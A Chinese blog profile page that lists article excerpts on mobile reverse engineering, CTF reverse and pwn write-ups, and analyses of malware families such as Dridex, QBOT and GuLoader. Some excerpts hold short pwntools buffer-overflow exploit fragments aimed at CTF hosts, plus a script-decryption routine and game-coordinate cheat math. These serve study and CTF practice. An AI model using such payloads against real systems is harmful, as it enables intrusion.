自定义博客皮肤VIP专享

*博客头图:

格式为PNG、JPG,宽度*高度大于1920*100像素,不超过2MB,主视觉建议放在右侧,请参照线上博客头图

请上传大于1920*100像素的图片!

博客底图:

图片格式为PNG、JPG,不超过1MB,可上下左右平铺至整个背景

栏目图:

图片格式为PNG、JPG,图片宽度*高度为300*38像素,不超过0.5MB

主标题颜色:

RGB颜色,例如:#AFAFAF

Hover:

RGB颜色,例如:#AFAFAF

副标题颜色:

RGB颜色,例如:#AFAFAF

自定义博客皮肤

-+
  • 博客(69)
  • 收藏
  • 关注

原创 ios逆向小记

reveal分析图层界面,找到图层所属类,利用frida-trace hook该类进行栈回溯确定关键点,同时可以通过图层类名称来推测其是否属于webview。

2023-03-16 00:16:53 380

原创 UE4 3D坐标转2D坐标

UE4 3D坐标转2D坐标视角相机ulocalplayer->playercontroller->cameramanager->POVstruct FMatrix RotatorToMatrix(struct FRotator rotation) { float radPitch = rotation.Pitch * ((float)M_PI / 180.0f); float radYaw = rotation.Yaw * ((float)M_PI / 180.0f); flo

2022-05-12 21:22:58 1049

原创 AndLua加密解密

进入关键函数Lua_loader_buffer首先判断第一个字符为=之后根据base64解码表映射解密base64,其中将第一个字符替换为0x1d,即为0x1d+0x2b=H解码base64后的结果如下所示如果第一个字符为0x1c进行异或解密最后再将第一个字符0x1c替换为0x78,进行inflate解码,解码完成后将第一个字符替换为28(0x1c)解密算法如下import base64import base64import zlibfp=open("main.lua","rb")

2022-05-10 01:26:46 3477 6

原创 easy-dex

easy-dex程序没有dex文件发现,android有两个Activity其中的一个Activity名称为android.app.NativeActivity且android:hasCode="false"表面该应用不包含java代码。 <activity android:configChanges="0xa0" android:label="@string/app_name" android:name="android.app.NativeActivity"> <m

2021-04-18 16:27:55 260

原创 where

where查看程序,发现这是一道msic没有.so对各个文件夹下内容一一分析META-INF下有个y文件再看asset文件夹下有个abc文件,好像是dex文件不过好像只有dex头在其中file_size=1395184header_size=1121395184-112=1395072炸弹引爆漏洞MANIFEST.MF:记录 apk 中每一个文件对应的摘要信息,防止某个文件被篡改CERT.SF:记录 MANIFEST.MF 文件的摘要,以及 MANIFEST.MF 中,每个数据块的摘要

2021-04-18 16:26:55 146

原创 黑客精神

黑客精神java层程序首先判断有没有注册,如果没注册执行注册,否则执行native层的work函数。逆向.so文件,入口为JNI_onload首先y修改变量类型为JNIEnv* 就可以看到各个函数名称,JNI_Onload函数利用注册本地方法将函数名称混淆了一下进入界面注册函数执行init_sn()函数读取/sdcard/reg.dat目录中的文件判断是否相等于字符串"EoPAoY62@ElRD"输入注册按钮之后,将输入的数值加密存储在/sdcard/reg.dat解密key = "W3_arE

2021-04-18 16:26:00 179

原创 Baby unity3D

Baby unity3DIL2CPP就是将Unity3D等转换为IL中间语言,IL中间语言再转换为CPP,CPP为静态语言,运行效率更高。assets/bin/Data/Managed/etc/global-metadata.dat发现文件被加密了,利用Frida脚本根据文件头"AF 1B B1 FA "进行dump但是没有找到源码解密用IDA搜索了一下global-metadata.dat查找LoadMetaData没有发现字符串顺着源码Runtime.cpp找到可疑字符串且发现了metada

2021-04-18 16:22:32 769 2

原创 移动安全入门

移动安全入门编写安卓程序xml界面类似于web的界面 layout为布局,wrap_content为填充布局,表示填充满<?xml version="1.0" encoding="utf-8"?><androidx.constraintlayout.widget.ConstraintLayout xmlns:android="http://schemas.android.com/apk/res/android" xmlns:app="http://schemas.andr

2021-04-18 16:17:04 250

原创 Dridex样本分析

Dridex分析报告基本信息样本名称INV_984748.xls样本类型excel恶意类型蠕虫远控SHA2567F8F24884E26B4B508D5147F8F54269E452D1200904323544EF36E30400190B1样本名称t9ak0.dllSHA256076547c290c80627993690a9e6c15eeb2ac9b86a9a33af2d3dbaab135f1f43ab主要执行流程excel打开启动

2020-10-07 00:42:52 6966

原创 羊城杯-RE

loginpyinstaller打包,用工具解一下,得到login.pyc修复一下文件头,反编译解方程组。from z3 import *s=Solver()code=[BitVec(('x%d'%i),32) for i in range(14)]a1 = code[2]a2 = code[1]a3 = code[0]a4 = code[3]a5 = code[4]a6 = code[5]a7 = code[6]a8 = code[7]a9 = code[9]a10 = co

2020-09-12 20:15:42 499 2

原创 ICEID

文章目录基本信息样本基本信息主要执行流程office宏pfsdnskdf.exe解密exe傀儡进程关键技术概览1.时间差检测2.cpuid3.隐写术4.傀儡进程5.浏览器注入6.流量混淆详细分析宏代码部分PFSDNSKDF.EXE微步云在线分析手动分析PFSDNSKDF.EXE下载解密文件分析微步云在线分析手动分析新shellcode傀儡进程火绒剑分析开启监听端口生成自签名证书对谷歌浏览器执行远线程注入手动分析其他参考链接基本信息样本基本信息文件名称fram.doc样本类型doc

2020-08-31 20:32:57 682

原创 Zloader分析

文章目录Zloader分析报告基本信息样本基本信息主要执行流程关键技术概览详细分析工具静态分析动态调试分析Zloader分析报告基本信息样本基本信息名称order_93.xls样本类型xls恶意类型加载器样本MD5ea2a84383a2ef3bdcea801e0f22a0072样本SHA1f74d0b4ac53ac4a9d898a77fb050328495b971f3主要执行流程样本启用excel4.0宏,进行一系列反沙箱行为之后,创建vbs下载

2020-08-31 19:44:59 494

原创 QBOT分析

QBOT分析报告文章目录QBOT分析报告基本信息主要执行流程关键技术概览反沙箱傀儡进程DLL详细分析vbs分析新vbs分析DLL分析新exe傀儡进程参考资料基本信息样本名称qakbot样本类型vbs恶意类型蠕虫远控样本MD52a4a6cc8bd52f618a0190a8529c82b7d样本SHA1ef3d638377e245d7f388b41aad5e3525a8ccd2ed主要执行流程样本是一封钓鱼邮件,下载文件是一个VBS文件,VBS开启了严

2020-08-31 19:28:38 1501 1

原创 ursnif分析

ursnif文章目录ursnif基本信息主要执行流程关键技术概览详细分析docexe网络连接动态调试基本信息样本名称5f894602e88263e34dcdbb2eb2da3078.doc样本类型doc恶意类型蠕虫远控MD5cc7ceb281d0780a1514f99a635ca35e4SHA2563122695bb31fa85dc8ff21b6f5f2ded5a1f306ea2520edafd44a653b2d277eef主要执行流程程序启动do

2020-08-31 19:20:22 618

原创 GuLoader分析报告

GuLoader分析报告文章目录GuLoader分析报告基本信息样本基本信息主要执行流程关键技术概览反虚拟机1.内存遍历检测字符串2.qemu-ga.exe3.窗口数量检测反逆向分析1.花指令2.反调试DLL函数加载反HOOK1.检测一2.检测二3.检测三4,检测四傀儡进程加密特征详细分析加载器部分傀儡进程部分行为检测修复HOOK&HOOK检测概述可行性窗口数检测概述可行性傀儡进程检测概述可行性qemu-ga.exe检测概述可行性反调试检测ZwSetInformationThread概述可行性pa

2020-06-23 13:28:11 579

原创 instr.scr样本分析

instr.scr样本分析报告文章目录instr.scr样本分析报告基本信息主要执行流程关键技术概览反沙箱详细分析instr.scrservices.exe参考链接基本信息主要执行流程instr.scr加了upx壳进行自我复制改名为java.exe,并设置自启动,且获取通讯录进行邮件传发送播自身。instr.scr同时会释放services.exe同样加了upx壳,设置自启动,且将自身作为服务端与外界进行通讯实现远控。关键技术概览反沙箱程序创建java.exe,删除,再将自身拷贝为java

2020-06-23 13:19:53 215

原创 进程创建期修改PE输入表法注入

进程创建期修改PE输入表法注入程序定义CImage类内部包含了一些有关PE结构的变量和一些函数函数列表如下findImagebase()AttachToProcess()InitializePEHeaders()AddNewSectionToMemory()LocateSectionByRVA()ALIGN_SIZE_UPALIGN_SIZE_UP(Size,Alignment...

2020-03-29 20:52:15 399

原创 BUU刷题(三)

BUU刷题(三)fmfrom pwn import *context.log_level='debug'p=process('./fm')p=remote("node3.buuoj.cn","27782")payload=p32(0x0804a02c)+'%11$n'p.sendline(payload)p.interactive()others_shellcode拿到题目直...

2020-03-13 22:10:19 891

原创 IAT结构分析

IAT结构分析IAT介绍解决兼容问题(不同机器的dll版本不同,地址自然不同),操作系统就必须提供一些措施来确保可以在其他版本的Windows操作系统,以及DLL版本下也能正常运行。这时IAT(Import Address Table:输入函数地址表)就应运而生了。IAT定位手工寻找利用PEview找到程序的NT头的可选头内有个import table此处记录了其RVA。根据结构体...

2020-03-13 22:08:44 615

原创 office-栈溢出漏洞简单汇总

CVE-2017-1182关键词:rtf,公式编辑器,拷贝未检测长度,ACTIVEX控件解析漏洞原理:在读入公式的Font Name数据时,在将Name拷贝到一个函数内局部变量的时候没有对Name的长度做校验,从而造成栈缓冲区溢出漏洞函数:漏洞存在于EQNEDT21.EXE公式编辑器的sub_41160F函数中,我们将其拖进IDA,找到漏洞点,可以看到伪代码如下,这里没有对长度进行检验...

2020-02-07 19:07:30 888

原创 BUU PWN (二)

BUU PWN (二)level0from pwn import *#p=process('./level0')p=remote("node3.buuoj.cn","26684")p.recvline()payload='a'*0x80+'a'*8+p64(0x400596)p.sendline(payload)p.interactive()ciscn_2019_n_5ret...

2020-02-07 15:29:49 809

原创 BUU PWN(一)

test_your_nc连上即可拿到shellripfrom pwn import *context.log_level='debug'#p=process('./17pwn1')p=remote("node3.buuoj.cn","26137")p.recvuntil("please input\n")payload='a'*0xf+'a'*8+p64(0x401186)p.s...

2020-01-28 20:37:49 2016

原创 ichunqiu圣诞欢乐赛babyre

ichunqiu圣诞欢乐赛babyre程序关键函数在此此处是一些有关于多线程的函数,正好借此机会学习一下,顺便学习了一下多线程调试文章如下https://bbs.pediy.com/thread-254194.htm多线程CreateThread函数为创建线程,创建线程成功即运行这个线程。其中第三个参数为指向线程函数的指针第四个参数为向线程函数传递的参数WaitForSingle...

2020-01-06 15:12:46 160

原创 internal chat圣诞欢乐赛

internal chat拿到题目开启的保护为很容易联想到覆写got表来getshell首先给注册一个用户,用户的结构体如下struct user{ char *user_name; __int64 age; char description[0x100]; _QWORD *addr; _QWORD *friend_addr; __in...

2020-01-05 15:56:59 112

原创 frame faking

int __cdecl main(int argc, const char **argv, const char **envp){ char buf; // [rsp+0h] [rbp-40h] setbuf(stdin, 0LL); setbuf(_bss_start, 0LL); setbuf(stderr, 0LL); puts("Input Your Name:"...

2020-01-05 15:56:18 296 2

原创 巅峰极客snote

巅峰极客snote链接:https://pan.baidu.com/s/1aAb4JjplV-MBj8iQCauI2Q提取码:977o复制这段内容后打开百度网盘手机App,操作更方便哦查看保护&大致逻辑是一个选单程序,且保护全开功能分析1.add2.showdword_202014为1,只能泄露一次3.deletedword_202010只能free一次,且...

2019-11-09 01:23:24 461

原创 RC4变种算法分析

RC4算法分析及其变种链接:https://pan.baidu.com/s/1IBKy1mYugLxsoupbMGeXnA提取码:4b1b复制这段内容后打开百度网盘手机App,操作更方便哦题目Main流程大致如下 sub_402690(*(_QWORD *)&argc, argv, envp); v10 = 'i esaelP'; v11 = 'eht tupn'; ...

2019-09-30 01:13:33 661

原创 CTF-wiki bin.exe 反调试练习

CTF-wiki bin.exe 反调试练习主函数大致逻辑如下:int __cdecl main(int argc, const char **argv, const char **envp){ FILE *v3; // eax HANDLE v4; // eax int v11; // [esp+C4h] [ebp-A8h] DWORD v12; // [esp+D4h] ...

2019-09-29 20:22:00 888

原创 BUGKU 代码审计练习

BUGKU 代码审计练习extract变量覆盖<?php$flag=flag.txt;extract($_GET);//数组键名作为变量名,使用数组键值作为变量值if(isset($shiyan))//检测变量是否为空{ $content=trim(file_get_contents($flag)); if($shiyan==$content) { echo'flag{...

2019-08-30 16:16:20 449

原创 HACKNOTE-UAF&system函数调用

HACKNOTE-UAF&system函数调用是一个32位选单程序主功能和开启的保护如下首先看add_note 部分unsigned int add_note(){ _DWORD *v0; // ebx signed int i; // [esp+Ch] [ebp-1Ch] int size; // [esp+10h] [ebp-18h] char buf; //...

2019-08-21 16:25:39 225

原创 1000levels-vsyscall

1000levels-vsyscall题目是一个64位的程序 具体保护如下程序主要分为两部分,分别为go部分和hint部分。首先先看简单的hint部分int hint(){ signed __int64 v1; // [rsp+8h] [rbp-108h] int v2; // [rsp+10h] [rbp-100h] __int16 v3; // [rsp+14h] [r...

2019-08-11 02:50:59 285

原创 babyfengshui-堆溢出

babyfengshui-堆溢出题目是一个32位的选单式程序,大致功能和保护如下逐一分析各个功能,首先是Add_user部分 printf("size of description: "); __isoc99_scanf("%u%c", &v2, &v0); sub_8048816(v2);_DWORD *__cdecl sub_80...

2019-07-31 21:48:40 193

原创 RCTF babyre xxtea

xxtea程序是一个64位ELF程序发现里面包含了TEA相关的加密,调试程序可知输入的长度需要为16,且之后有3个关键的函数三个函数处理之后的结果与0x17异或之后,需要输出Bingo!第一个函数很简单是将我们输入的字符串变成HEX(测试字符1234567890123456)进入第二个函数,找到了第XXTEA的黄金比例(0x9e3779b9)首先排除TEA因为TEA加密没有拿黄...

2019-07-28 18:06:15 856

原创 C++栈溢出

c++栈溢出程序开启的保护如下程序在注册的地方存在着栈溢出漏洞v20 = __readfsqword(0x28u); std::__cxx11::basic_string<char,std::char_traits<char>,std::allocator<char>>::basic_string(&v17); do { me...

2019-07-24 14:08:32 673

原创 AES CBC 逆向分析,异常处理,反调试

AES CBC 逆向分析,异常处理,反调试AES CBC拿到题目在IDA中看见了类似AES的图标放入PEID的KANAL插件查看找到了AES的S盒和BASE64的S盒,初步确定了内部的加密算法为AES和base64。来到关键函数4020D0处此处对输入字符串进行了加密。进入该函数输入字符串首先和sctfsctfsctfsctf进行了异或之后又于sycloversyclover进...

2019-07-23 13:15:47 817

原创 babyheap_fastbin_attack

babyheap-堆溢出之fastbin_attack首先检查程序保护保护全开。是一个选单系统分析程序void new(){ int index; // [rsp+0h] [rbp-10h] signed int size; // [rsp+4h] [rbp-Ch] void *ptr; // [rsp+8h] [rbp-8h] for ( index = 0; i...

2019-06-23 13:28:35 228

原创 格式化字符串在bss段上的处理

格式化字符串在bss段上的内容处理先查看程序保护,保护全开拿到程序一眼就看到了格式化字符串的漏洞int __cdecl main(int argc, const char **argv, const char **envp){ int v3; // eax char buf; // [esp+0h] [ebp-10h] unsigned int v6; // [esp+4h]...

2019-06-19 21:53:37 2471 6

原创 格式化字符串漏洞-无限循环

格式化字符串漏洞-无限循环程序大致逻辑如下,程序存在system函数,保护只开了NX setvbuf(stdin, 0, 2, 0); setvbuf(stdout, 0, 2, 0); puts("Welcome to my ctf! What's your name?"); __isoc99_scanf("%64s", &format); printf("Hello...

2019-06-16 15:13:49 1527

原创 4-ReeHY-main-double_free

4-ReeHY-main-double_free拿到程序看一下保护和内容只开了NX保护是一个有关于堆的创建删除编辑的程序。拿到程序寻找漏洞点。首先进入create函数 int result; // eax char buf; // [rsp+0h] [rbp-90h] void *dest; // [rsp+80h] [rbp-10h] int v3; // [rsp+8...

2019-06-15 14:27:26 436

原创 time_formatter-UAF利用

time_formatter-UAF利用看一眼程序主逻辑__int64 __fastcall main(__int64 a1, char **a2, char **a3){ __gid_t v3; // eax FILE *v4; // rdi __int64 v5; // rdx int v6; // eax __int64 result; // rax v3 =...

2019-06-12 16:20:01 632 4

空空如也

空空如也

TA创建的收藏夹 TA关注的收藏夹

TA关注的人

提示
确定要删除当前文章?
取消 删除